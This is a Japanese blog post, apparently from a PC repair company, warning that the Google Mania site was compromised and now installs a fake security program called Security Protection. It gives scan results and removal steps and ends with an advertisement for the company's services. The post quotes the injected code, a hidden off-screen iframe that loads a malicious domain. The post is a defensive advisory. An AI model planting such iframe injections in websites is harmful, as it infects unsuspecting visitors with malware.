事の始まりはgoogleさんで調べ物をしてたどり着いたGoogle Maniaというサイト。
このサイトではgoogleの各種サービスについて詳しい解説などがされていて、この関係としては結構人気があると思われます。
検索でも最上位に表示されるような状況なので知っている方も多いかもしれません。
改竄されてしまったサイト(Google Mania)
ところがこのサイト長らくメンテナンス等されておらず放置状態となっています。
サイト自体も古いバージョンのCMSが利用されており既知の重大な脆弱性を持っているのですがメンテナンスされていない事もあって、悪意のある第3者によってサイトの改ざんが行われてしまっています。(ざっと確認しましたが全ページ改ざんされているようです)
6月頃に一度改ざんされて攻撃サイトと化してしまっていたようです(ソース)が、改ざんで埋め込まれたサイトが停止された事でいったんは落ち着いたようです。
(サイトメンテナンスによって改ざんされたわけではないようで、脆弱性はそのまま?)
今回2011年8月22日(今日)にアクセスしたわけですが、新しく改ざんされたかもしくは停止されたサイトが復帰したかの理由によりまたしても攻撃サイトと化しています。
しかも現時点(8月22日 17:00)でほとんどのセキュリティーソフトが検知できない新種の偽セキュリティソフトが勝手にPCにインストールされ実行されてしまうという状況なのです。
(改ざんされたサイト)
Google Mania(google-mania.net)
(不正コード)
<div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”*ttp://kliemwrznr.co.**/i.php?go=1″ width=”3″ height=”3″></iframe></div>
(ウィルス検査結果)
======================================= VirSCAN.org Scanned Report : Scanned time : 2011/08/22 17:14:43 (JST) Scanner results: 5% のアンチウイルスが(2/37) マルウェアと判定しました File Name : 0.2367670180808894.exe File Size : 936448 byte File Type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5 : 22f95e63e1e109d894149c6b9949d59f SHA1 : 5e1c325627988ebe86ea3dae280764334442104b Online report : http://r.virscan.org/173025f2d056d40ef7d8ff2442d76494 Scanner Engine Ver Sig Ver Scan result a-squared 5.1.0.3 20110822060411 - AhnLab V3 2011.08.22.02 2011.08.22 - AntiVir 8.2.6.32 7.11.13.155 - Antiy 2.0.18 20110804.11725727 - Arcavir 2011 201107140423 - Authentium 5.1.1 201108211932 - AVAST! 4.7.4 110821-1 Win32:FakeAlert-AZL [Trj] AVG 8.5.850 271.1.1/3849 - BitDefender 7.90123.8954708 7.38720 - ClamAV 0.97.1 13462 - Comodo 5.1 9829 - CP Secure 1.3.0.5 2011.08.19 - Dr.Web 5.0.2.3300 2011.08.22 - F-Prot 4.6.2.117 20110822 - F-Secure 7.02.73807 2011.08.22.01 - Fortinet 4.2.257 13.567 - GData 22.1742 20110822 - ViRobot 20110820 2011.08.20 - Ikarus T3.1.32.20.0 2011.08.22.79150 - JiangMin 13.0.900 2011.08.21 - Kaspersky 5.5.10 2011.08.22 - KingSoft 2009.2.5.15 2011.8.22.14 - McAfee 5400.1158 6445 - Microsoft 1.7604 2011.08.22 - NOD32 3.0.21 6398 - Norman 6.07.10 6.07.00 - Panda 9.05.01 2011.08.21 - Trend Micro 9.200-1012 8.360.11 - Quick Heal 11.00 2011.08.20 - Rising 20.0 23.71.03.03 - Sophos 3.22.0 4.68 Mal/FakeAV-LX Sunbelt 3.9.2497.2 10238 - Symantec 1.3.0.24 20110821.003 - nProtect 20110821.01 12475755 - The Hacker 6.7.0.1 v00282 - VBA32 3.12.16.4 20110821.1017 - VirusBuster 5.3.0.4 14.0.179.0/5952350 - =======================================
検出できたものは「Win32:FakeAlert-AZL [Trj]」、「Mal/FakeAV-LX」として発見していますね。
偽セキュリティソフト(Security Protection)ですので自分を棚に上げて存在しないウィルスを大量に発見したかのように振る舞い
駆除するためにお金を払え(ソフトを購入しろ)という動作を行います。
攻撃手法の詳細は分かりませんが危険な状態ですね。
偽セキュリティソフト(Security Protection)
一度感染すると自分以外の常駐プログラムをどんどん強制終了させ、本物のセキュリティソフトも停止させられます。
また、偽セキュリティソフトを終了させようとタスクマネージャー等を立ち上げても強制終了させられてしまいます。
ということで一度動作し出すとシャットダウンするしかなくなります。
(偽セキュリティソフトが動いていますが意味がないですし、他の不正プログラムをネットから引っ張ってくる可能性もあります)
駆除は以下の方法で可能です。(幸い今回のケースは簡単でした)
- 感染を確認したら即時ネットワーク接続を切断しパソコンをシャットダウンします。
有線接続の場合はケーブルを抜き、無線接続の場合は電波をOFFにするかアクセスポイントの接続を切断します。 - 再度電源を入れます。画面に何か表示されたらしばらくF8キーをトントン押し続けて下さい。
詳細オプションの選択メニュー(またはWindows拡張オプションメニュー)が表示されます。 - 「セーフモード」を選択してWindowsを起動します。
- 偽セキュリティソフトの起動を停止
スタート→すべてのプログラム→スタートアップ→に「Security Protection」という項目があるので
マウスカーソルがこの上において 右クリック→削除 - デスクトップのショートカットなどを削除
デスクトップ上に「Security Protection」というショートカットがあるので削除。
また、でたらめなファイル名アイコンがある場合はこれも削除(これが偽セキュリティソフトのインストーラーです)。
偽セキュリティソフトのアイコン
- 偽セキュリティソフト本体を削除
WindowsVista、7の場合
C:\Users\(ログイン名)\AppData\Roaming\defender.exeWindowsXP,2000の場合
C:\Documents and Settings\All Users\Application Data\defender.exeが偽セキュリティソフト本体なのでこれを削除
-
元の状態に戻す
パソコンを再起動します。
起動が終わったらネット接続を元に戻します(線を繋ぎ直す、または無線を再接続)。
以上です。
対象の箇所にファイルがない場合はファイル名でパソコン内を検索等してみて下さい。
(数日経てばほとんどのセキュリティソフトで対応できると思いますが。。。)
サイト管理者は自分のサイトに責任を持って管理していただきたいものですね。
昔のようにいわゆる危ないサイトにいかなければウィルスに感染しないという時代はとっくに終わっています。今回のようにウィルス対策ソフトのワクチンが間に合わない場合もありますが、それでも最低限の防御をしてより安全にインターネット等を楽しんでいただければと思います。
自信がない&原因が違うなどの場合は是非弊社にお預けください!
他社には断られたような事案も大歓迎。お困りのことがあったら、お気軽にご連絡ください。お見積もりは無料です。
Tel:0268-75-8270
または
「お問い合わせ」
よりご連絡ください。